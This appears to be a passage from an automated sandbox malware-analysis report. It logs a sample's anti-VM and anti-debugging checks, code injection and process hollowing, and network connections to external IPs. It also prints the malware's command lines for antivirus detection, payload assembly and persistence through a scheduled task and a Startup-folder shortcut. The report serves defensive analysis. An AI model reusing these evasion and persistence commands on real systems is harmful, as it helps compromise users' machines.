Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E8CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	25_2_00E8CD9F
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E8CD14 FindFirstFileW,FindClose,	25_2_00E8CD14
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E8F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	25_2_00E8F5D8
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E8F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	25_2_00E8F735
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E8FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	25_2_00E8FA36
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E83CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	25_2_00E83CE2

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E35D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

25_2_00E35D13

Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\795933\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\795933	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: explorer.exe, 00000001.00000000.1705270958.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	Binary or memory string: ParallelsVirtualMachine
Source: explorer.exe, 00000001.00000000.1704715234.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1703368759.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1703368759.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000001.00000000.1705270958.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1702194356.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1703368759.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1705270958.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1703368759.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	Binary or memory string: xmlphpvlczpl wpl xpacketimport hrefXML:NAMESPACEaid DOCTYPE ELEMENT ENTITY -- <mdb:mork:zAFDR aom saved from url=(-->xmlns=jobwmlRDFnzbsvgkmlgpxCaRxslJDFrssRSStagTAGXMIlmxloclogIMGtmxosmX3DVERCFLRCCncxxbkSCFrtcpseSDOmapnviofcasxdivLogopmlsmilrootpgmlxfdfXFDLBASEtei2xbeljnlpdgmlfeedFEEDinfobeancasevxmlsesxnotesitetasklinkxbrlGAEBXZFXFormqgisSMAIHDMLjsonpsplbodyheadmetadictdocuembedplistTEI.2xliffformsQBXMLTypeseaglehtml5myapptablestyleentrygroupLXFMLwindowdialogSchemaschemacommonCanvaslayoutobjectFFDataReporttaglibARCXMLgnc-v2modulerobloxXDFV:4Xara3DLayoutRDCManattachwidgetreportSchemewebbuyloaderdeviceRDF:RDFweb:RDFoverlayprojectProjectabiwordxdp:xdpsvg:svgCOLLADASOFTPKGfo:rootlm:lmxarchivecollagelibraryHelpTOCpackagesiteMapen-noteFoundryweblinkReportssharingWebPartTestRunpopularsnippetwhpropsQBWCXMLcontentkml:kmlSDOListkDRouteFormSetactionslookupssectionns2:gpxPaletteCatalogProfileTreePadMIFFileKeyFilepayloadPresetsstringsdocumentDocumentNETSCAPEmetalinkresourcenewsItemhtmlplusEnvelopeplandatamoleculelicensesDatabasebindingsWorkbookPlaylistBookFileTimeLinejsp:rootbrowsersfotobookMTSScenemessengercomponentc:contactr:licensex:xmpmetadiscoveryERDiagramWorksheetcrickgridHelpIndexWinampXMLrecoIndexTomTomTocen-exportAnswerSetwinzipjobmuseScorePHONEBOOKm:myListsedmx:EdmxYNABData1workspacePlacemarkMakerFileoor:itemsscriptletcolorBookSignaturexsd:schemadlg:windowFinalDraftVirtualBoxTfrxReportVSTemplateWhiteboardstylesheetBurnWizarddictionaryPCSettingsRedlineXMLBackupMetaxbrli:xbrlFontFamilys:WorkbookFictionBookdia:diagramdefinitionsNmfDocumentSnippetRootSEC:SECMetanet:NetfileCustSectionDieCutLabelPremierDataUserControljsp:includess:Workbookapplicationjsp:useBeancfcomponentparticipantSessionFilejasperReporthelpdocumentxsl:documentxsl:templatePremiereDataSettingsFileCodeSnippetsFileInstancetpmOwnerDataDataTemplateProject_DataTfrReportBSAnote:notepadFieldCatalogUserSettingsgnm:WorkbookLIBRARY_ITEMDocumentDatamso:customUIpicasa2albumrnpddatabasepdfpreflightrn-customizecml:moleculemuveeProjectRelationshipsVisioDocumentxsl:transformD:multistatusKMYMONEY-FILEBackupCatalogfile:ManifestPocketMindMapDiagramLayoutannotationSetLEAPTOFROGANSpublic:attachsoap:EnvelopepersistedQuerymx:ApplicationOverDriveMediaasmv1:assemblyHelpCollectionQvdTableHeaderSCRIBUSUTF8NEWw:wordDocumentPADocumentRootConfigMetadataBorlandProjectDTS:ExecutableMMC_ConsoleFilelibrary:libraryglade-interfacerg:licenseGroupdisco:discoveryAdobeSwatchbookaudacityprojectoffice:documentCoolpixTransfersqueeze_projectwirelessProfileProjectFileInfowsdl:definitionsScrivenerProjectfulfillmentTokenkey:presentationdynamicDiscoverylibrary:librariesClickToDvdProjectDataCladFileStorechat_api_responseMyApplicationDataKeyboardShortcutsDeepBurner_recordXmlTransformationdata.vos.BudgetVOIRIDASCompositionpresentationClipsoor:component-datalibraryDescriptionPowerShellMetadataResourceDictionaryxsf:xDocumentClassoffice:color-tableVisualStudioProjectActiveReportsLayoutwap-provisioningdocAfterEffectsProjectoor:component-sch
Source: DFA6.exe, 0000001A.00000000.2334640220.0000000000401000.00000020.00000001.01000000.0000000B.sdmp	Binary or memory string: QEMUU
Source: explorer.exe, 00000001.00000000.1704715234.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: RegAsm.exe, 0000001F.00000002.4119407498.0000000005200000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluu*
Source: explorer.exe, 00000001.00000000.1704715234.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1704715234.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, DFA6.exe, 0000001A.00000003.2420328030.0000000000A6F000.00000004.00000020.00020000.00000000.sdmp, DFA6.exe, 0000001A.00000002.2423280675.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2618548795.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost015.exe, 0000001D.00000002.2618548795.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: svchost015.exe, 0000001D.00000002.2618548795.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: explorer.exe, 00000001.00000000.1705270958.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1703368759.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1702194356.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1704715234.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1702194356.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

API call chain: ExitProcess graph end node

graph_25-97771

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewggbbh	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewggbbh	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E945D5 BlockInput,

25_2_00E945D5

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E35240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

25_2_00E35240

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E55CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

25_2_00E55CAC

Source: C:\Users\user\AppData\Local\Temp\329C.exe

Code function: 7_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress,

7_2_00406312

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00840D90 mov eax, dword ptr fs:[00000030h]	0_2_00840D90
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_0084092B mov eax, dword ptr fs:[00000030h]	0_2_0084092B
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_0089BC5D push dword ptr fs:[00000030h]	0_2_0089BC5D
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_006A092B mov eax, dword ptr fs:[00000030h]	3_2_006A092B
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_006A0D90 mov eax, dword ptr fs:[00000030h]	3_2_006A0D90
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_00859A55 push dword ptr fs:[00000030h]	3_2_00859A55

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E788CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

25_2_00E788CD

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E4A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_00E4A385
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E4A354 SetUnhandledExceptionFilter,	25_2_00E4A354
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C86B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	29_2_6C86B66C
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C86B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_6C86B1F7
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA1AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	29_2_6CA1AC62

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe

Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: ewggbbh.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 94.228.169.44 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 191.191.224.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 92.36.226.66 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 84.32.84.144 443	Jump to behavior

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: DFA6.exe PID: 1396, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\DFA6.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\DFA6.exe

Code function: 26_2_0301A090 NtAllocateVirtualMemory,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,

26_2_0301A090

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Thread created: C:\Windows\explorer.exe EIP: 31319B0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewggbbh	Thread created: unknown EIP: 31719B0			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Memory written: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe base: 350000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewggbbh	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ewggbbh	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\DFA6.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\svchost015.exe base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Memory written: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe base: 350000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Memory written: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe base: 571000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 41E000
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42B000
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 63E000

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E79369 LogonUserW,

25_2_00E79369

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E35240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

25_2_00E35240

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E81AC6 SendInput,keybd_event,

25_2_00E81AC6

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E851E2 mouse_event,

25_2_00E851E2

Source: C:\Users\user\AppData\Local\Temp\329C.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Teach Teach.bat & Teach.bat & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 795933	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "tagsnegotiationthreadadobe" Literature	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Church + ..\Activity + ..\Yahoo + ..\Census + ..\Mario + ..\Postcards + ..\Vessel + ..\Vhs + ..\Maps + ..\Convenience + ..\Comment + ..\Shift z	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\795933\Burn.pif Burn.pif z	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif	Process created: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cheese" /tr "wscript //B 'C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr" "C:\Users\user\AppData\Local\SwiftTech Solutions\w"
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr" "C:\Users\user\AppData\Local\SwiftTech Solutions\w"

Source: C:\Users\user\AppData\Local\Temp\795933\Burn.pif

Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftserve.url" & echo url="c:\users\user\appdata\local\swifttech solutions\swiftserve.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftserve.url" & exit

Jump to behavior

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

25_2_00E788CD

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E84F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

25_2_00E84F1C

Source: Burn.pif, 00000011.00000003.2227175462.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, Burn.pif, 00000011.00000000.2216453971.00000000006D6000.00000002.00000001.01000000.00000007.sdmp, SwiftServe.scr, 00000019.00000000.2240164533.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RegAsm.exe, 0000001F.00000002.4107921007.00000000026DE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.4107921007.0000000002728000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.4121284717.00000000059C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000001.00000000.1702415655.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1704715234.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1703220670.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1702415655.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 0000001F.00000002.4107921007.00000000026DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q@
Source: RegAsm.exe, 0000001F.00000002.4107921007.0000000002642000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerCA2365E7EDCE48"
Source: explorer.exe, 00000001.00000000.1702194356.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1702415655.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1702415655.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager
Source: RegAsm.exe, 0000001F.00000002.4107921007.00000000026DE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.4107921007.0000000002728000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.4107921007.000000000268E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerTe^q

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E4885B cpuid

25_2_00E4885B

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe VolumeInformation

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E60030 GetLocalTime,__swprintf,

25_2_00E60030

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E60722 GetUserNameW,

25_2_00E60722

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E5416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

25_2_00E5416A

Source: C:\Users\user\AppData\Local\Temp\329C.exe

Code function: 7_2_0040681B GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

7_2_0040681B

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: RegAsm.exe, 0000001F.00000002.4105752238.00000000008F0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\795933\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

